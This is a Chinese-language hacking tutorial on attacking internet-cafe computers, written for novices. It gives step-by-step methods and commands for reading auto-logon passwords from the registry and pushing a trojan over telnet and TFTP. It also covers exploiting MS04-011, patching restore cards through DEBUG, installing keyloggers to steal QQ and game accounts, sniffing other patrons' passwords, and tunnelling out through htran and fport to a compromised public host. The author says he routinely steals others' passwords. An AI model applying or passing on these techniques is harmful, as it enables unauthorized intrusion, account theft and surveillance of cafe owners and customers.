經常看x檔案，發現關于破解pubwin和萬象的文章比較多，今天我決定寫點網吧入侵方面的文章，希望對一些小菜有所幫助，高手見笑了！ 
            一. 網吧入侵
    入侵的方法很多，但對網吧入侵最常用的方法是什么呢？首先，自動登陸。現在網吧一般都是win2000或者windows xp的機器，網管一般都把機子設置為自動登陸！這樣我們開機進入系統的時候登陸窗口一閃而過！著時候如果我們findfass.exe試圖把登陸賬號密碼找出來是不會成功的！因為賬號密碼根本不在內存中，而findfass.exe通過winlogon的PID號和正確的域名中，在內存尋找好段加了密的內存塊(保存著加密過的登陸密碼)，然后對它進行解密，這樣就能得到明文的密碼。實際上自動登陸的賬號密碼都在注冊表中。我們打開注冊表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\這個目錄下，AutoAdminLogon這一項的鍵值為1，表示自動登陸。為1的時候，打開控制面板的用戶和密碼，會發現需要密碼前面的鉤已經去掉了。DefaultUserName對應的鍵值就是登陸用戶名，DefaultPassword對應的鍵值就是登陸密碼。實際上海洋頂端木馬2006就有著一功能，原理是一樣的，不過因為權限的問題，不一定能讀出來。這樣，密碼賬號我們都找出來了。而且你要知道，一個網吧的自動登陸密碼賬號一般都是一樣的，而且網管為了方便網蟲上網一般把他們設置在管理員組，至少user組。知道了密碼賬號還愁入侵不了么？網吧機子的server服務一般是禁用的，那我們就不能用ipc入侵了。opentelnet.exe我們也用不了，因為著個也依賴ipc連接，dameware遠程控制也不行，道理一樣。我們可以用recton著個小巧實用的工具來開telnet，這個工具在win2000下面特別好使。 

    開了telnet后，我們telnet上去，先在本機打開tftpd32.exe,再telnet下面telnet -i myip get 3721.exe c:\3721.exe,這樣就把我們的木馬3721.exe比如radmin傳過去了。 
    再在telnet下面直接運行3721.exe就ok了。
    另一個方法就是ms04011漏洞，別以為著個漏洞已經過時了，在網吧這個漏洞還是相當普遍的，許多網吧的網管只會裝游戲，重裝系統，不重視著寫漏洞，懶得打補丁！我們用DSScan掃描192.168.0.1-192.168.0.255,一般會你會很驚喜的。我們到用ms04011溢出工具溢出，一下子就得到了系統權限。 
    還有很多入侵方法，你可以把xscan搬出來掃描一下。很多菜鳥喜歡用啊D工具包來掃網吧的空口令，實際上這個工具掃用戶賬號密碼很弱，以前我試過，我用上面第一種方法發現網吧都有一個密碼為空的管理員賬號，用啊D工具包只掃出幾臺機子有這個賬號。我經常用我的最愛
閃電狐——火狐端口掃描器來掃一下網吧主機，第一服務器等。著個掃描器速度很快，掃1到10000端口也要不了幾分鐘。如果發現服務器開80斷口，自然是看是不是架設了網站。再看網站十分有漏洞，想辦法傳個asp木馬上去提升權限。如果發現電影服務器裝了serv_u,而且你有了一個賬號，可以嘗試一下serv_u的溢出。 
          二.網吧牧馬
    在網吧安裝木馬最重要的是把它的還原破了，現在網吧的還原系統一般有3種，即還原卡，還原精靈，冰點還原精靈。硬盤還原卡其實所謂硬盤保護卡就是在ROM中寫了一段HOOK INT 13的程序，屏蔽了 
一些功能調用如AH=3，5等，在中斷向量表中INT 13的SEG，OFFSET 
描述為[13h*4+2]，[13h*4]，將此中的程序先保存后，再替換為自己的代碼， 
當你AH=2的時，它便會call原始INT 13地址來完成(商周)作. 
只要找到原始INT 13入口便可以為所欲為. 
具體過程如下: 
開機過程按住F8鍵,進入純dos環境, 注";"后為注釋. 
出現提示符c:, 
鍵入c:\debug, 
- a100 
- xor ax,ax 
- int 13 
- int3 
; 尋找原始的int 13入口. 
然后輸入t回車，不斷的重復，直到顯示的地址形如 F000:xxxx 
,后面的指令為:mov dl,80 (練練眼力-。按q退出. 
記下這一地址, 在(0:13H*4)=0:4cH 處填入這個地址。 
例如俺的得到的地址是F000:9A95 
再次運行debug ,鍵入: 
-e 0:4c 95 9A 00 F0 e的作用將數據表"95 9A 00 f0",寫入地址0:4c開始的字節中. 
-q 
注： 填的時候要仔細，填錯的話會死機。ok,破解完成. 
這時在提示符c:\鍵入 
c:\win 
進入windows系統即可,那么這次你在windows系統中的一切(商周)作,隨著下一次 
的啟動都會被還原卡存儲起來。 
這種辦法大家都知道，不過操作起來也有點危險，弄不好啟動不了。而且win2000沒有dos環境,到底性不行呢？呵呵，我還沒有
做這個危險的嘗試。不過望上有很多關于破解還原卡的工具可以下載，到底什么工具最好使，大家自己測試。
至于還原卡，網上有密碼讀取器，不過著工具只能在win98下面使用。在win2k下面我們可以用winhex來破解，次方法很奏效，
應該是最好的辦法。先隨便輸個錯誤的密碼，彈出錯誤窗口后不動，用winhex查找主要內存，找到還原精靈，再搜索我們開始
輸的錯誤密碼。在錯誤密碼的旁邊應該就有正確的密碼。我們輸入正確的密碼轉存就行了。這里很簡單，就不截圖了！
   至于冰點還原，好像還沒有破解辦法，這個的確很厲害。不過他有個選項，就是重啟多少次后不還原，沒事你可以多重啟
試一下，別把機子整壞了就行。
   破了還原后就裝木馬了。我們最好裝鍵盤記錄或密碼截獲木馬，盜qq，游戲賬號，郵箱賬號等等。比如密碼結巴等工具，也可以
把瀏覽器默認主頁設置為你的網頁木馬。如果網吧的默認主頁都是一樣，而你有能力入侵了那個網站，在默認主頁上掛馬那更好！ 

            三.網吧嗅探。
   如果你想知道網吧某個mm的qq號，那你就用QQSniffer,Ver2005build5.5。也可以用xniffer,用于嗅探域網中或本機的pop.smtp.ftp等明文傳輸的tcp/ip協議密碼。格式是 xsiff.exe -pass -hide -log pass.log  xsiff.exe -tcp -udp -asc -addr 192.168.1.1。如果你不喜歡著個，還有個密碼監聽器，密碼監聽器用于監聽網頁的密碼，包括網頁上的郵箱、論壇、聊天室等等。只需在一臺電腦上運行，就可以監聽局域網內任意一臺電腦登錄的賬號和密碼，并將密碼顯示、保存，或發送到用戶指定的郵箱。我就經常有密碼監聽器2.4破解版在網吧監聽別人
密碼！當然網吧最適合dns欺騙！
如圖3。 
            四.端口轉發。
   為了能隨時隨地控制網吧機器，在家也可以！我們最好來個端口轉發。首先我們可以用fport.exe(這個工具在angelshell1.0包里面有）,格式為fport <local port> <your ip> <your port>但是使用他可以不必安裝后門，只需要普通的權限即可執行。網吧服務器一般是win2000server版的，我們趁管理員不注意，給他開3389。如果他的ip為192.168.0.1，我們就在他的命令行下執行fport.exe 3389 myip 9999,這里的myip可以是我們的一只有公網ip的肉雞。我們再在公網ip的肉雞上運行FportClient.exe著個是客戶端。著樣我們登陸公網ip的肉雞的9999端口就進了網吧主機。在上面看第電影趕什么都行，不被發現就行了，我們動作輕點就行了。我們也可以給網吧主機裝代理。就用htran2.4,SocksCap。在網吧主機命令行下上執行htran.exe -install （安裝Socks5服務），htran.exe -start （啟動Socks5服務），再執行"htran.exe -s -connect 共網肉雞ip 3389。在自己的共網肉雞上執行htran.exe -s -listen 3389 5200（監聽端口）.現在用SocksCap連接 218.3.1.1 的5200端口，就等于進入了網吧主機。我們也可以
用vidc來映射端口，這個和fport差不多就不多說了。